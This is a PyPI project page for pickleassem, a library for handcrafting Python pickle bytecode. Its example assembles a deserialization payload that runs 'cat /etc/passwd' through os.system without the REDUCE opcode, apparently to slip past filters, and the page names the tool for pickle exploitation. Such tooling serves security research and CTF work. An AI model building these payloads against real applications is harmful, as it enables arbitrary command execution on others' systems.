Skip to main content

A simple pickle assembler to make handcrafting pickle bytecode easier.

Project description


PyPI - Downloads PyPI - Version PyPI - Format PyPI - Python Version PyPI - Status License

A simple pickle assembler to make handcrafting pickle bytecode easier.


import pickle
import pickletools

from pickleassem import PickleAssembler

pa = PickleAssembler(proto=4)
pa.push_short_binunicode('cat /etc/passwd')
pa.build_inst('os', 'system')
payload = pa.assemble()
assert b'R' not in payload
pickletools.dis(payload, annotate=1)


b'\x80\x04(\x8c\x0fcat /etc/passwdios\nsystem\n.'
    0: \x80 PROTO      4 Protocol version indicator.
    2: (    MARK         Push markobject onto the stack.
    3: \x8c     SHORT_BINUNICODE 'cat /etc/passwd' Push a Python Unicode string object.
   20: i        INST       'os system' (MARK at 2) Build a class instance.
   31: .    STOP                                   Stop the unpickling machine.
highest protocol among opcodes = 4


Install with pip: pip install -U pickleassem


Just refer to the source code. Each method of PickleAssembler whose name begins with push, build, pop or memo corresponds to a pickle opcode.

The following opcodes and corresponding features are not implemented: PERSID, BINPERSID, EXT1, EXT2, EXT4, FRAME, NEXT_BUFFER, READONLY_BUFFER.

See Also

Other tools for pickle exploit:

Project details

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Files for pickleassem, version 1.0.0
Filename, size File type Python version Upload date Hashes
Filename, size pickleassem-1.0.0-py3-none-any.whl (8.1 kB) File type Wheel Python version py3 Upload date Hashes View
Filename, size pickleassem-1.0.0.tar.gz (8.3 kB) File type Source Python version None Upload date Hashes View

Supported by

Pingdom Pingdom Monitoring Google Google Object Storage and Download Analytics Sentry Sentry Error logging AWS AWS Cloud computing DataDog DataDog Monitoring Fastly Fastly CDN DigiCert DigiCert EV certificate StatusPage StatusPage Status page